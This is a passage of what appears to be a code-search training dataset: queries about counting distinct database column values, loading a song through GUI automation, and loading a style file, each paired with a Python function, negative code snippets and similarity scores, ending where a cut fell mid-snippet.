[ "0.56505555", "0.55544376", "0.5534052", "0.54158044", "0.53334355", "0.5333287", "0.52193576", "0.5107352", "0.5105168", "0.5078217", "0.5057607", "0.5046411", "0.5044533", "0.5042941", "0.503666", "0.50231636", "0.50128746", "0.4965802", "0.4953175", "0.4945569", "0.49108866", "0.48914155", "0.48866516", "0.48823622", "0.48821336", "0.48602012", "0.4848346", "0.48473504", "0.48434496", "0.484191" ]
0.8394844
0
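The same clause-building idea, generalized so either bound may be omitted; this is a sketch of the technique rather than the record's exact function, with the table and data invented for the demo:

```python
import sqlite3

def count_rows_greater(curs, table, x_gte=None, y_gte=None):
    clauses, vals = [], []
    if x_gte is not None:
        clauses.append("x >= ?")
        vals.append(x_gte)
    if y_gte is not None:
        clauses.append("y >= ?")
        vals.append(y_gte)
    where = "WHERE " + " AND ".join(clauses) if clauses else ""
    sql = "SELECT COUNT(*) FROM {} {};".format(table, where)
    return curs.execute(sql, vals).fetchone()[0]

conn = sqlite3.connect(":memory:")
curs = conn.cursor()
curs.execute("CREATE TABLE t (x INTEGER, y INTEGER);")
curs.executemany("INSERT INTO t VALUES (?, ?);", [(1, 9), (5, 5), (7, 2)])
print(count_rows_greater(curs, "t", x_gte=5, y_gte=5))  # -> 1
print(count_rows_greater(curs, "t", y_gte=5))           # -> 2
```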
Queries the database for the number of distinct values in the col column of a table.
def count_distinct_col(curs, table_name, col='y'):
    return curs.execute("""SELECT COUNT(DISTINCT {}) FROM {};""".format(
        col, table_name)).fetchone()[0]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_unique_counts(df, colname):\n\treturn list(dict(df[colname].value_counts(ascending=False, dropna=False)).values())", "def get_counts(df,col_name):\n return df.groupBy(col_name).count().show()", "def get_unique(self):\n unique_values = len(self.df[self.col_name].unique())\n return unique_values", "def unique_count(df):\r\n\r\n data = []\r\n\r\n for column in df.columns:\r\n data.append((column, df.select(column).distinct().count()))\r\n\r\n return spark.createDataFrame(data, ['column', 'count'])", "def check_unique(df):\n\n print(\"Number of unique values for each column\")\n print(\"=======================================\")\n # print number of unique values of each column\n for col in df.columns:\n print(f\"{col}: {df[col].nunique()}\")", "def __uniqueCountsPandas(df, resCol):\n return df.groupby(resCol).size().to_dict()", "def count_entries(df, col_name='lang'):\n\n # Initialize an empty dictionary: cols_count\n cols_count = {}\n \n # Extract column from DataFrame: col\n col = df[col_name]\n\n # Iterate over the column in DataFrame\n for entry in col:\n\n # If entry is in cols_count, add 1\n if entry in cols_count.keys():\n cols_count[entry] += 1\n\n # Else add the entry to cols_count, set the value to 1\n else:\n cols_count[entry] = 1\n\n # Return the cols_count dictionary\n return cols_count", "def return_uniques_and_counts(df):\n keys, count = dict(), dict()\n keys = (\n df.iloc[:, :].sum(axis=1).apply(set).apply(sorted).to_dict()\n ) # adding all columns\n count = {k: len(v) for k, v in keys.items()}\n\n return keys, count", "def count_entries(df, col_name='lang'):\n \n # Raise a ValueError if col_name is NOT in DataFrame\n if col_name not in df.columns:\n raise ValueError('The DataFrame does not have a ' + col_name + ' column.')\n\n # Initialize an empty dictionary: cols_count\n cols_count = {}\n \n # Extract column from DataFrame: col\n col = df[col_name]\n \n # Iterate over the column in DataFrame\n for entry in col:\n\n # If entry is in cols_count, add 1\n if entry in cols_count.keys():\n cols_count[entry] += 1\n # Else add the entry to cols_count, set the value to 1\n else:\n cols_count[entry] = 1\n \n # Return the cols_count dictionary\n return cols_count", "def get_unique_values(df, colname):\n\treturn list(dict(df[colname].value_counts(ascending=False, dropna=False)).keys())", "def count_entries(self, tablename):\n query = \"Select count(*) from \" + tablename\n try:\n self.__cur.execute(query)\n except Exception as e:\n self.__conn.rollback()\n raise e\n fetcheddata = self.__cur.fetchone()\n return fetcheddata[0]", "def count(column, value, glob=False):\r\n query = db.session.query(func.count('*'))\r\n if glob:\r\n query = query.filter(column.ilike(value))\r\n else:\r\n query = query.filter(func.lower(column) == value.lower())\r\n return query.one()[0]", "def count(self, *columns):\n if not columns:\n columns = ['*']\n\n return int(self.aggregate('count', *columns))", "def count(query):\n cursor = db.execute_sql(query)\n result = cursor.fetchone()[0]\n return result", "def same_num_of_unique_val(df):\n value_count =dict()\n for col in df.columns:\n value_count[col] = list(df[col].value_counts())\n similar_columns = [i for i in combinations(df.columns,2) if (value_count[i[0]]==value_count[i[1]] and i[0] != i[1])]\n if similar_columns != []:\n for (col1, col2) in similar_columns :\n printmd(str(\"* *\" + str(col1) +\"* and *\"+ str(col2)+ \"* have same number of values \"))\n a = pd.DataFrame(df[col1].value_counts()).reset_index()\n a.columns = [str('values_'+col1), 
'count']\n b = pd.DataFrame(df[col2].value_counts()).reset_index()\n b.columns = [str('values_'+col2), 'count']\n to_display = a.merge(b, on = 'count')\n display(to_display[['count', str('values_'+col1), str('values_'+col2)]])\n\n else :\n printmd(\"* No columns have same number of unique values\")", "def unique_values(df):\n cols = list(df.columns)\n\n for col in cols:\n uniques = (df[col]).unique()\n print(f\"{len(uniques)} unique items in {col}: {df[col].loc[0]},{df[col].loc[1]}, {df[col].loc[2]}...\")", "def size_sqlite_table(cursor,table_name):\n #Inspired by code of Pieter Muller\n columnsQuery = \"PRAGMA table_info({0})\".format(table_name)\n cursor.execute(columnsQuery)\n numberOfColumns = len(cursor.fetchall())\n \n rowsQuery = \"SELECT Count() FROM ({0})\".format(table_name)\n cursor.execute(rowsQuery)\n numberOfRows = cursor.fetchone()[0]\n return({'nrow':numberOfRows,'ncol':numberOfColumns})", "def fast_count(db, Model): # noqa\n return db.session.execute(\n 'SELECT n_live_tup FROM pg_stat_all_tables WHERE relname = :tablename',\n {'tablename': Model.__tablename__}\n ).scalar()", "def get_number_of_unique_values(X, columns=\"all\", rows_to_scan=10000,\n objects_only=False, return_series=False,\n skip_nans=True):\n if skip_nans:\n print(\"skip_nans not implemented yet\")\n \n if rows_to_scan > X.shape[0] or rows_to_scan == \"all\":\n rows_to_scan = X.shape[0]\n unique_counts = pd.Series()\n \n if columns == \"all\":\n columns = X.columns\n elif type(columns) == str:\n columns = [columns]\n \n for variables in columns:\n if not objects_only or X.dtypes[variables]==\"object\":\n list_of_unique_values = X[variables][:rows_to_scan].unique()\n number_of_unique_values = len(list_of_unique_values)\n# if skip_nans and np.isnan(list_of_unique_values).any():\n# number_of_unique_values -= 1\n unique_counts[variables] = number_of_unique_values\n \n unique_counts.sort()\n pd.set_option('display.max_rows', len(X))\n print(unique_counts)\n pd.set_option('display.max_rows', 0)\n \n if return_series:\n return unique_counts", "def get_record_counts(schema_name, table_name, column_name=''):\n if column_name == '':\n sql = \"\"\"\n SELECT\n count(*) AS 'COUNT',\n null AS 'MIN_VALUE',\n null AS 'MAX_VALUE',\n null AS 'MONTH_CNT'\n FROM\n {0}.{1} with(nolock);\n \"\"\"\n else:\n sql = \"\"\"\n SELECT\n count(*) AS 'COUNT',\n min({2}) AS 'MIN_VALUE',\n max({2}) AS 'MAX_VALUE',\n datediff(MONTH, MIN({2}), MAX({2})) AS 'MONTH_CNT'\n FROM\n {0}.{1} WITH(nolock);\n \"\"\"\n\n return fetch_row(sql.format(schema_name, table_name, column_name))", "def count_entries(df, *args):\n \n #Initialize an empty dictionary: cols_count\n cols_count = {}\n \n # Iterate over column names in args\n for col_name in args:\n \n # Extract column from DataFrame: col\n col = df[col_name]\n \n # Iterate over the column in DataFrame\n for entry in col:\n \n # If entry is in cols_count, add 1\n if entry in cols_count.keys():\n cols_count[entry] += 1\n \n # Else add the entry to cols_count, set the value to 1\n else:\n cols_count[entry] = 1\n\n # Return the cols_count dictionary\n return cols_count", "def n_count(category):\r\n sql = text('''\r\n WITH uniq AS (\r\n SELECT COUNT(app.id) FROM task, app\r\n LEFT OUTER JOIN category ON app.category_id=category.id\r\n WHERE\r\n category.short_name=:category\r\n AND app.hidden=0\r\n AND app.info LIKE('%task_presenter%')\r\n AND task.app_id=app.id\r\n GROUP BY app.id)\r\n SELECT COUNT(*) FROM uniq\r\n ''')\r\n\r\n results = db.engine.execute(sql, category=category)\r\n count = 0\r\n for 
row in results:\r\n count = row[0]\r\n return count", "def countPlayers():\n #gets the player column from the players table\n conn = DB().execute(\"SELECT COUNT(player) FROM players;\")\n #gets the result of the select statement\n count = conn[\"cursor\"].fetchone()[0]\n conn[\"cursor\"].close()\n return count", "def count_instances(tbl, col2count, colcounted):\n counted_ser = tbl[col2count].value_counts()\n counted_df = pd.DataFrame(counted_ser, columns=[colcounted]).reset_index()\n counted_df.rename(columns={'index':col2count},inplace=True)\n tbl = tbl.merge(counted_df,on=col2count)\n return tbl", "def specht(mu):\n return StandardTableaux(mu).cardinality().n()", "def values_in_col(cursor, table_name, print_out=True):\n c.execute('PRAGMA TABLE_INFO({})'.format(table_name))\n info = c.fetchall()\n col_dict = dict()\n for col in info:\n col_dict[col[1]] = 0\n for col in col_dict:\n c.execute('SELECT ({0}) FROM {1} WHERE {0} IS NOT NULL'.format(col, table_name))\n # In my case this approach resulted in a better performance than using COUNT\n number_rows = len(c.fetchall())\n col_dict[col] = number_rows\n if print_out:\n print(\"\\nNumber of entries per column:\")\n for i in col_dict.items():\n print('{}: {}'.format(i[0], i[1]))\n return col_dict", "def fast_count(query):\n count_query = (query\n .statement.with_only_columns([func.count()]).order_by(None))\n count = query.session.execute(count_query).scalar()\n return count", "def func_Q1(db):\n grades_collection = db.grades\n student_list = list(grades_collection.distinct(\"student_id\", {}))\n\n return len(student_list)", "def query_count(query, params=None):\n count_query = 'SELECT COUNT(*) FROM (' + query + ') AS a;'\n response = database.get_engine().execute(count_query, params)\n count = response.fetchone()\n response.close()\n return count[0]", "def sql(query):\n cursor = db.execute_sql(query)\n list_of_tuples = cursor.fetchall()\n lis = [i[0] for i in list_of_tuples]\n dictionary = {element: lis.count(element) for element in lis}\n return dictionary" ]
[ "0.6991576", "0.69485164", "0.6879922", "0.6863142", "0.67103183", "0.6590594", "0.6463755", "0.63715804", "0.63554555", "0.6342957", "0.6308717", "0.6272405", "0.626818", "0.62482023", "0.62392485", "0.61953485", "0.61704886", "0.61700535", "0.61607206", "0.61574954", "0.61498404", "0.61441994", "0.61106503", "0.6097328", "0.6090846", "0.6073708", "0.6055891", "0.60344297", "0.60020596", "0.5995294" ]
0.8021922
0
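And a quick standalone check of the `COUNT(DISTINCT ...)` helper; the sample data is invented:

```python
import sqlite3

def count_distinct_col(curs, table_name, col='y'):
    return curs.execute("""SELECT COUNT(DISTINCT {}) FROM {};""".format(
        col, table_name)).fetchone()[0]

conn = sqlite3.connect(":memory:")
curs = conn.cursor()
curs.execute("CREATE TABLE t (s TEXT, x INTEGER, y INTEGER);")
curs.executemany("INSERT INTO t VALUES (?, ?, ?);",
                 [("a", 1, 2), ("b", 3, 2), ("c", 4, 5)])
print(count_distinct_col(curs, "t"))           # y in {2, 5}    -> 2
print(count_distinct_col(curs, "t", col="x"))  # x in {1, 3, 4} -> 3
```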
Load a song from the given file.
def load_song(self, path):
    self._menu_select('File->Open')
    self._open_file(path)
    try:
        # Get the annoying Comments window out of the way
        self._app.Comments.minimize()
    except MatchError:
        pass
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def loadSong(fileName):\n with open (fileName, 'r') as f:\n testSong = ast.literal_eval(f.read())\n\n return testSong", "def load(self, song):\n self.currentSongName = song\n self.currentSong = pygame.mixer.music.load(song)", "def _load_sound(file: str) -> pyglet.media.Source:\n\n return pyglet.media.load(Config.RES_DIR + \"sound\" + Config.FILE_SEPARATOR + file)", "def load_music(self, filename):\n self.music = filename\n self.music_playing = False\n if self.is_running:\n if filename is not None:\n cocos.audio.music.control.load(filename)\n else:\n cocos.audio.music.control.stop()", "def play_music(music_file):\n music_file = stim(music_file)\n clock = pygame.time.Clock()\n try:\n pygame.mixer.music.load(music_file)\n print \"Music file %s loaded!\" % music_file\n except pygame.error:\n print \"File %s not found! (%s)\" % (music_file, pygame.get_error())\n return\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy():\n # check if playback has finished\n clock.tick(30)", "def play_audio(file: str) -> None:\n pygame.mixer.init()\n pygame.mixer.music.load(file)\n pygame.mixer.music.play()\n\n while pygame.mixer.music.get_busy():\n continue", "def load_sound(self, filename):\n return mixer.Sound(os.path.join(\"sounds\", filename))", "def play_music(music_file):\n clock = pygame.time.Clock()\n #try-catch for playing audio from MIDI file\n try:\n pygame.mixer.music.load(music_file)\n print \"Music file %s loaded!\" % music_file\n self.update()\n except pygame.error:\n print \"File %s not found! (%s)\" % (music_file, pygame.get_error())\n return\n pygame.mixer.music.play() #plays MIDI file\n self.update() #updates frame", "def load(self, path):\n (folder, filename) = os.path.split(path)\n (name, extension) = os.path.splitext(filename)\n return Sound(name, Waveform.load(path))", "def play(path):\n sound = AudioSegment.from_mp3(path)\n playback.play(sound)", "def loadTestSong (filename):\n testSong = {}\n #information of analysed song stored in dictionary testSong\n testSong[\"spectrogram\"] = STFTsignal.getSTFTofFile(filename)\n testSong[\"name\"] = filename\n return testSong", "def read(self, filename: Union[str, Path]) -> Music:\n return read_musicxml(filename)", "def playmusic(self, soundfile):\n clock = pygame.time.Clock()\n pygame.mixer.music.load(soundfile)\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy():\n clock.tick(FRAMERATE)", "def load(self, file):\n self._load(file.encode())", "def from_file(cls, path):\n mp3 = eyed3.load(path)\n\n if mp3 is None:\n raise ValueError(\"File {} does not seem to be a valid MP3\")\n\n self = cls(path)\n self.current_position = None\n self.mtime = os.path.getmtime(path)\n\n if mp3.tag is None:\n # Fallback if no ID3 available\n (dirname, self.title) = os.path.split(path)\n (dirname, self.album) = os.path.split(dirname)\n self.artist = \"\"\n self.track_num = None\n else:\n self.title = mp3.tag.title\n self.artist = mp3.tag.artist\n self.album = mp3.tag.album\n self.track_num = mp3.tag.track_num[0]\n\n return self", "def play_music1(music_file):\n clock = pygame.time.Clock()\n try:\n pygame.mixer.music.load(music_file)\n print (\"Music file %s loaded!\" % music_file)\n except pygame.error:\n print (\"File %s not found! 
(%s)\" % (music_file, pygame.get_error()))\n return\n pygame.mixer.music.play()\n while pygame.mixer.music.get_busy():\n # check if playback has finished\n clock.tick(30)", "def test_load_mp3_file(self):\n track = Track.from_filename(self.track_path('silence.mp3'))\n self.assertEqual(track.artist, 'Artist')\n self.assertEqual(track.album, 'Album')\n self.assertEqual(track.title, 'Track')\n self.assertEqual(track.ensemble, 'Group')\n self.assertEqual(track.composer, 'Composer')\n self.assertEqual(track.conductor, 'Conductor')\n self.assertEqual(track.tracknum, 1)\n self.assertEqual(track.seconds, 2.0)", "def loadPlayerFile (self):\n #print self.__filename\n if self.__filename == \"\":\n self.__setPlayerFilename()\n #print \"filename= \" + self.__filename \n try:\n #filename handled internally -- derive it from playerName\n# print self.__filename\n f = open(self.__filename, \"r\")\n tempIn = pickle.load(f)\n self.__playerName = tempIn.getPlayerName()\n self.setBestStepRun(tempIn.getBestStepRun())\n self.__songDictionary = tempIn.getAllSongs()\n self.setDifficulty(tempIn.getDifficulty())\n self.setHighScore(tempIn.getHighScore())\n self.setLevelReached(tempIn.getLevelReached())\n f.close() \n except IOError:\n raise PlayerIOError(\"Unable to read player info from file.\")", "def load(self, filename):\n raise NotImplementedError", "def load(cls, filename):\n \n raise NotImplementedError(\"not implemented!\")", "def test_load_opus_file(self):\n track = Track.from_filename(self.track_path('silence.opus'))\n self.assertEqual(track.artist, 'Artist')\n self.assertEqual(track.album, 'Album')\n self.assertEqual(track.title, 'Track')\n self.assertEqual(track.ensemble, 'Group')\n self.assertEqual(track.composer, 'Composer')\n self.assertEqual(track.conductor, 'Conductor')\n self.assertEqual(track.tracknum, 1)\n self.assertEqual(track.seconds, 2.0)", "def create_from_eyed3_file(cls, audio_file):\n #We are doing this here so we throw a very clear import error\n #if eyed3 is unavailable, but only if someone is trying\n #to use functionality that depends on it\n #eyed3 is used to inspect MP3 files\n import eyed3\n\n if not isinstance(audio_file, eyed3.core.AudioFile):\n raise TypeError(\"You broke promises :(\")\n\n return Song(\n audio_file.tag.title, audio_file.tag.artist, audio_file.tag.album,\n audio_file.info.time_secs, audio_file.path)", "def importsong(fpath):\n result = \"\"\n\n tags = checkid3(fpath)\n if tags is not None:\n sig = sigfile(fpath)\n exsong = Song.objects.filter(uniq=sig)\n\n if len(exsong) > 0:\n if exsong[0].filename != fpath:\n result = updatesong(exsong[0], fpath)\n else:\n result = \"[X] %s\" % exsong[0].title\n else:\n result = createsong(tags, sig, fpath, songminplay())\n else:\n logger.error('No tags found in [%s]' % fpath)\n\n return result", "def play_song(self):\r\n path = input('Give path to wanted song: ') # Request path to song\r\n path = path.replace('\\\\', '/')\r\n if not self.path_storage_re.match(path): # Check if the wanted song is from the storage directory\r\n print(\"Give a valid path\")\r\n else:\r\n p = vlc.MediaPlayer(path) # Create VLC instance and play the song\r\n p.play()\r\n self.playSong.append(p)\r\n self.isPlaying = True", "def test_load_ogg_file(self):\n track = Track.from_filename(self.track_path('silence.ogg'))\n self.assertEqual(track.artist, 'Artist')\n self.assertEqual(track.album, 'Album')\n self.assertEqual(track.title, 'Track')\n self.assertEqual(track.ensemble, 'Group')\n self.assertEqual(track.composer, 'Composer')\n 
self.assertEqual(track.conductor, 'Conductor')\n self.assertEqual(track.tracknum, 1)\n self.assertEqual(track.seconds, 2.0)", "def play(song):\n # Show the metadata\n if (verbose==True):\n for s in song.keys():\n print s, \":\", \n print song[s]\n else:\n print \"Title:\", song[\"title\"]\n print \"Artisit:\", song[\"artist\"]\n print \"Album:\", song[\"albumtitle\"]\n print \"Year\", song[\"public_time\"]\n print \"Company:\", song[\"company\"]\n print \"Length\", song[\"length\"]\n print \"Playing...\"\n mp3_url = song[\"url\"]\n song_length = song[\"length\"]\n p = subprocess.Popen([\"mplayer\", \"-msglevel\", \"all=0\", mp3_url])\n\n # At the same time, download the song:\n u = urllib2.urlopen(mp3_url)\n local_mp3 = open(song[\"title\"] + \"-\" + song[\"artist\"] + \".mp3\", \"w\")\n local_mp3.write(u.read())\n local_mp3.close()\n # time.sleep(song_length)\n i = 0\n while(True):\n time.sleep(1)\n i += 1\n if i == song_length:\n # Kill the process when the song is finished.\n p.terminate()\n print \"#\" * 80\n break", "async def play(self, ctx, *, filename: str):\r\n if not ctx.voice_client:\r\n await self.connect(ctx)\r\n if filename not in self.audio_files:\r\n await ctx.send(\"File {0} not found\".format(filename))\r\n await self.audiofiles(ctx)\r\n else:\r\n ctx.voice_client.play(discord.FFmpegPCMAudio(source=\"{0}{1}.mp3\".format(self.audio_base_dir, filename)))\r\n await ctx.message.delete()", "def load_file(fname):\n ext = os.path.splitext(fname)[1].lower()\n funcptr = _FILEEXTENSIONS.get(ext, None)\n if not funcptr:\n raise ValueError(\"unsupported audio file type\")\n return funcptr(fname)", "def play(filename):\n SoundClient(blocking=True).playWave(filename)", "def load_wav_file(fname):\n fp = wave.open(fname, \"rb\")\n channels = fp.getnchannels()\n bitrate = fp.getsampwidth() * 8\n samplerate = fp.getframerate()\n buf = fp.readframes(fp.getnframes())\n return SoundData(buf, channels, bitrate, len(buf), samplerate)" ]
[ "0.7358361", "0.72585785", "0.6847177", "0.68328434", "0.6698162", "0.66567945", "0.65592307", "0.65188473", "0.6471673", "0.64638644", "0.6448192", "0.6430223", "0.64215535", "0.63958055", "0.63943523", "0.63796645", "0.6167352", "0.61342967", "0.61297315", "0.6129407", "0.61065775", "0.6095958", "0.60752887", "0.60028", "0.6002665", "0.5918124", "0.59161365", "0.5864952", "0.58593047", "0.58585197" ]
0.7262814
1
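The document above is pywinauto-style GUI automation. A hedged sketch of the same open-a-file flow follows; the window title, control names, and file path are guesses for illustration, not details from the source, and it only runs against a live Windows application:

```python
from pywinauto.application import Application
from pywinauto.findbestmatch import MatchError

# Connect to an already-running app; the title regex is an assumption.
app = Application(backend="win32").connect(title_re=".*Band-in-a-Box.*")
app.top_window().menu_select("File->Open")
app.Open.Edit.set_edit_text(r"C:\songs\demo.sgu")  # hypothetical path
app.Open.Open.click()
try:
    app.Comments.minimize()  # the comments popup may or may not appear
except MatchError:
    pass  # no such window this time; nothing to dismiss
```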
Load a style from the given file.
def load_style(self, path):
    self.wait_ready()

    def open_dialog():
        # Bring up the style popup menu and choose to open a style file
        self._song_pane.click_input(coords=(44, 73), absolute=False)
        menu = self._app.window(class_name='#32768')
        menu.menu_item('File Open Style').click_input()

    wait_until_passes(func=open_dialog, exceptions=ElementNotFoundError,
                      timeout=120, retry_interval=0.4)
    self._open_file(path)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def loadStyleSheet(self, filename):\n try:\n self.cssfile = \"gui/\" + filename\n with open(self.cssfile, \"r\") as f:\n self.setStyleSheet(f.read())\n except IOError:\n logger.error('No style sheet found!')", "def loadStyleSheet(self, styleFile=None):\n #Read the default file\n file = QtCore.QFile(\"resources/styles/default.css\")\n if not file.open(QtCore.QIODevice.ReadOnly | QtCore.QIODevice.Text) is True :\n raise IOError(\"Can't load the style file.\")\n stylesheet = file.readAll()\n\n #Conversion from QByteArray to Unicode String\n codec = QtCore.QTextCodec.codecForName(\"KOI8-R\")\n string = codec.toUnicode(stylesheet)\n\n #Apply the style to the whole application\n self.setStyleSheet(string)", "def load(self, styleFile):\n\t\tsfile = {}\n\t\twith open(styleFile) as fp:\n\t\t\tsfile = json.load(fp)\n\t\t\n\t\tif \"font\" in sfile:\n\t\t\tself.font = Font(logic.expandPath(sfile[\"font\"]))\n\t\telse:\n\t\t\tself.font = Font()\n\n\t\tif \"text_color\" in sfile:\n\t\t\tself.text_color = sfile[\"text_color\"]\n\t\t\n\t\tif \"disabled_text_color\" in sfile:\n\t\t\tself.disabled_text_color = sfile[\"disabled_text_color\"]\n\t\t\n\t\tif \"regions\" not in sfile or \"image\" not in sfile:\n\t\t\traise Exception(\"Invalid Style file.\")\n\t\t\n\t\timg = ImageTexture(logic.expandPath(sfile[\"image\"]))\n\n\t\tfor name, np in sfile[\"regions\"].items():\n\t\t\tif name in self.textures:\n\t\t\t\tcontinue\n\t\t\tregion = np[0]\n\t\t\tlp, rp, bp, tp = np[1]\n\t\t\tself.textures[name] = NinePatch(img, lp, rp, bp, tp, region)", "def load_style():\n display(HTML(Path('bhsa.css').read_text()))", "def load_style_sheet() -> str:\n return _preprocess_style(_read_text('style.css.template'))", "def load_style_sheet(self, sheetName):\n try:\n file = QFile('%s.qss' % sheetName.lower())\n file.open(QFile.ReadOnly)\n\n styleSheet = file.readAll()\n styleSheet = str(styleSheet, encoding='utf8')\n\n self.setStyleSheet(styleSheet)\n finally:\n file.close()", "def loadstyle(style_name):\n\n style = {}\n nwc_styles = {} # for backwards compatibility\n style_file = os.path.join(HERE, '..', 'rc', style_name)\n try:\n # Check rc directory for built in styles first\n rc_file(style_file)\n except FileNotFoundError:\n # Check current working dir or path\n style_file = style_name\n try:\n rc_file(style_file)\n except FileNotFoundError as err:\n raise StyleNotFoundError(f\"No such style file found: {err}\")\n style = rcParams.copy()\n\n # The style files may also contain an extra section with typography\n # for titles and captions (these can only be separately styled in code,\n # as of Matplotlib 2.2)\n # This is a hack, but it's nice to have all styling in one file\n # The extra styling is prefixed with `#!`\n with open(style_file, 'r') as file_:\n doc = file_.readlines()\n rc_params_newsworthy = \"\\n\".join([d[2:]\n for d in doc if d.startswith(\"#!\")])\n rc_params_newsworthy = yaml.safe_load(rc_params_newsworthy)\n ###\n # Typography\n ###\n if \"title_font\" in rc_params_newsworthy:\n nwc_styles[\"title_font\"] = [\n x.strip() for x in rc_params_newsworthy[\"title_font\"].split(\",\")\n ]\n else:\n nwc_styles[\"title_font\"] = style[\"font.family\"]\n\n # define as pt or reltive (\"smaller\")\n nwc_styles[\"subtitle.fontsize\"] = rc_params_newsworthy.get(\n \"subtitle.fontsize\",\n None,\n )\n\n # make annotation same font size as ticks by default\n tick_font_size = style.get('xtick.labelsize', \"smaller\")\n nwc_styles[\"annotation.fontsize\"] = rc_params_newsworthy.get(\n \"annotation.fontsize\",\n 
tick_font_size,\n )\n nwc_styles[\"note.fontsize\"] = rc_params_newsworthy.get(\n \"note.fontsize\",\n \"smaller\",\n )\n nwc_styles[\"caption.fontsize\"] = rc_params_newsworthy.get(\n \"caption.fontsize\",\n \"smaller\",\n )\n\n color = rc_params_newsworthy.get(\"neutral_color\",\n rcParams[\"figure.edgecolor\"])\n black_color = rc_params_newsworthy.get(\"black_color\", BLACK)\n dark_gray_color = rc_params_newsworthy.get(\"dark_gray_color\", DARK_GRAY)\n light_gray_color = rc_params_newsworthy.get(\"light_gray_color\", LIGHT_GRAY)\n strong_color = rc_params_newsworthy.get(\"strong_color\", color)\n positive_color = rc_params_newsworthy.get(\"positive_color\", POSITIVE)\n negative_color = rc_params_newsworthy.get(\"negative_color\", NEGATIVE)\n warm_color = rc_params_newsworthy.get(\"warm_color\", WARM)\n cold_color = rc_params_newsworthy.get(\"cold_color\", COLD)\n fill_between_color = rc_params_newsworthy.get(\"fill_between_color\", FILL_BETWEEN)\n fill_between_alpha = rc_params_newsworthy.get(\"fill_between_alpha\", 0.5)\n nwc_styles[\"black_color\"] = to_rgba(\"#\" + str(black_color), 1)\n nwc_styles[\"dark_gray_color\"] = to_rgba(\"#\" + str(dark_gray_color), 1)\n nwc_styles[\"light_gray_color\"] = to_rgba(\"#\" + str(light_gray_color), 1)\n nwc_styles[\"neutral_color\"] = to_rgba(\"#\" + str(color), 1)\n nwc_styles[\"strong_color\"] = to_rgba(\"#\" + str(strong_color), 1)\n nwc_styles[\"positive_color\"] = to_rgba(\"#\" + positive_color, 1)\n nwc_styles[\"negative_color\"] = to_rgba(\"#\" + negative_color, 1)\n nwc_styles[\"warm_color\"] = to_rgba(\"#\" + warm_color, 1)\n nwc_styles[\"cold_color\"] = to_rgba(\"#\" + cold_color, 1)\n nwc_styles[\"fill_between_color\"] = to_rgba(\"#\" + str(fill_between_color), 1)\n nwc_styles[\"fill_between_alpha\"] = float(fill_between_alpha)\n\n if \"qualitative_colors\" in rc_params_newsworthy:\n nwc_styles[\"qualitative_colors\"] = [\n to_rgba(\"#\" + c.strip(), 1)\n for c in rc_params_newsworthy[\"qualitative_colors\"].split(\",\")\n ]\n\n else:\n nwc_styles[\"qualitative_colors\"] = [to_rgba(\"#\" + c, 1) for c in QUALITATIVE]\n if \"logo\" in rc_params_newsworthy:\n nwc_styles[\"logo\"] = rc_params_newsworthy[\"logo\"]\n\n return style, nwc_styles", "def load_style() -> str:\n return '<style id=\"scipp-style-sheet\">' + load_style_sheet() + '</style>'", "def load_stylesheet(name):\n with suppress(FileNotFoundError):\n with open(STATIC_PATH / name, 'rt') as stylesheet:\n style = stylesheet.read().replace('@Path', (IMAGES_PATH / settings.value(Key.Theme)).as_posix())\n return style\n return ''", "def load_string(f):\n\n with open(\"css/{filename}.seas\".format(filename=f), \"r\") as design:\n Builder.load_string(design.read())", "def load_font(self, file):\n self.font = []\n with open(file, 'rb') as f:\n while True:\n buf = f.read(FONT_HEIGHT)\n if not buf:\n break\n self.font.append(buf)", "def load_QtCSS_StyleSheet(path):\n with open(path, \"rt\") as f:\n lines = f.read()\n return lines", "def load_file(file_name):\n file = open(file_name, 'r')#open the file\n colors = file.read() #reads entire contents of the file and assigns it to names. 
This is the processing of the file\n file.close() #always close the file\n\n return colors", "def apply_css(self, path):\n\n provider = Gtk.CssProvider()\n provider.load_from_path(path)\n Gtk.StyleContext.add_provider_for_screen(\n Gdk.Screen.get_default(), provider, Gtk.STYLE_PROVIDER_PRIORITY_APPLICATION)", "def _load_font(file: str) -> None:\n\n pyglet.font.add_file(Config.RES_DIR + \"font\" + Config.FILE_SEPARATOR + file)\n pyglet.font.load(\"Munro\")", "def load(self, file):\n self.namespace['workflow'].configfile(file)\n self.updateNamespace()", "def load_from_file(cls, filename):\n with open(filename, \"r\") as fd:\n return cls.load(fd)", "def load_from(filename):\n from .io import load\n return load(filename)", "def load(self, file):\n self._load(file.encode())", "def _load_external(self, url):\n if url.startswith('//'):\n # then we have to rely on the base_url\n if self.base_url and 'https://' in self.base_url:\n url = 'https:' + url\n else:\n url = 'http:' + url\n\n if url.startswith('http://') or url.startswith('https://'):\n css_body = self._load_external_url(url)\n else:\n stylefile = url\n if not os.path.isabs(stylefile):\n stylefile = os.path.abspath(\n os.path.join(self.base_path or '', stylefile)\n )\n if os.path.exists(stylefile):\n with codecs.open(stylefile, encoding='utf-8') as f:\n css_body = f.read()\n elif self.base_url:\n url = urllib.parse.urljoin(self.base_url, url)\n return self._load_external(url)\n else:\n raise ValueError(\"Could not find external style: %s\" %\n stylefile)\n return css_body", "def load(self, file_path):\n get_base().scene_parser.load(file_path)", "def load(self, file):\n\n with open(file, 'r') as f:\n self._lines = Lines(f.read().splitlines())\n\n self._parse()", "def load(self, file):\n\n with open(file, 'r') as f:\n self._lines = Lines(f.read().splitlines())\n\n self._parse()", "def load(file):\n _config.load(file)", "def load_from_file(cls, file=None, file_path=None):\n if not file:\n file = open(file_path, 'r') \n if not file_path:\n file_path = file.name\n with file:\n file_meta = cls._get_file_meta(file, file_path=file_path)\n cls_properties = dict([[p, file_meta.get(p, None)] for p in cls.properties()])\n cls(key_name=file_path, **cls_properties).put()", "def load(filename):\n path = Path(__file__).parent / \"resources\" / filename\n with path.open() as file:\n return lkml.load(file)", "def load(cls, filename):\n \n raise NotImplementedError(\"not implemented!\")", "def from_cheetah_file(cls, filename):\n return translate.load_cheetah(cls, filename)", "def load(path, colorkey):\n tpath = _path(path)\n if tpath in _cache:\n return _cache[tpath].get_sheet(colorkey)\n else:\n sheet = Spritesheet(tpath, colorkey)\n _cache[tpath] = sheet\n return sheet.get_sheet(colorkey)", "def load_default_style(self):\n self._css_shape = {\n 